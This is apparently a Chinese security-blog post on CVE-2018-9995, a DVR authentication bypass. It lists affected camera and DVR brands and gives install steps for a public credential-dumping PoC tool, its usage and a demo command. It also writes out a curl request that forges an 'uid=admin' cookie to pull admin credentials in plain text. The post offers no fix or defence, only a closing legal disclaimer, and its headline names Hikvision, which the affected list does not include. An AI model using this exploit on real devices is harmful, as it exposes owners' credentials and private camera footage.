金御网安

海康威视摄像头,DVR账户远程劫持漏洞

发布时间:4年前热度: 3510 ℃评论数:

    你知道吗,你身边的摄像头正在悄悄泄露你的隐私...据外媒报道,一位阿根廷黑客在5月发布了一款功能强大的新型黑客工具,可以轻松提取各种厂商的DVR的明文凭证,授予攻击者访问权限,并且可以随意查看录制的视频.

INDOOR.png

20180510103742.png


shodan_1.png

login_1.png

login_6.png

in_x.png

已知受影响的设备有:

Novo

CeNova

QSee

Pulnix

XVR 5 in 1 (title: "XVR Login")

Securus,  - Security. Never Compromise !! - 

Night OWL

DVR Login

HVR Login

MDVR Login

112.png

EXP:

这个名为 getDVR_Credentials 的工具是 CVE-2018-9995 的概念验证(Proof-of-Concept, PoC),它是 Fernandez 在上月初发现的一个安全漏洞。通过使用 “Cookie:uid = admin” 的 Cookie 标头来访问特定 DVR 的控制面板,DVR 将以明文形式响应设备的管理员凭证。整个开发过程足够小,甚至通过一条微博就能够发布。

TOOL: "Show all DVR Credentials"

Quick start

usr@pwn:~$ git clone https://github.com/ezelf/CVE-2018-9995_dvr_credentials.git

usr@pwn:~$ cd CVE-2018-9995_dvr_credentials

usr@pwn:~$ pip install -r requirements.txt

help

usage: getDVR_Credentials.py [-h] [-v] --host HOST [--port PORT]


[+] Obtaining Exposed credentials


optional arguments:

  -h, --help     show this help message and exit

  -v, --version  show program's version number and exit

  --host HOST    Host

  --port PORT    Port

[+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81


利用:

$> curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

poc_4.png

附上工具链接:

https://github.com/ezelf/CVE-2018-9995_dvr_credentials

{请勿非法,请遵守国家网络安全法及相关法律,并全部承担责任}


摄像头,隐私

手机扫码访问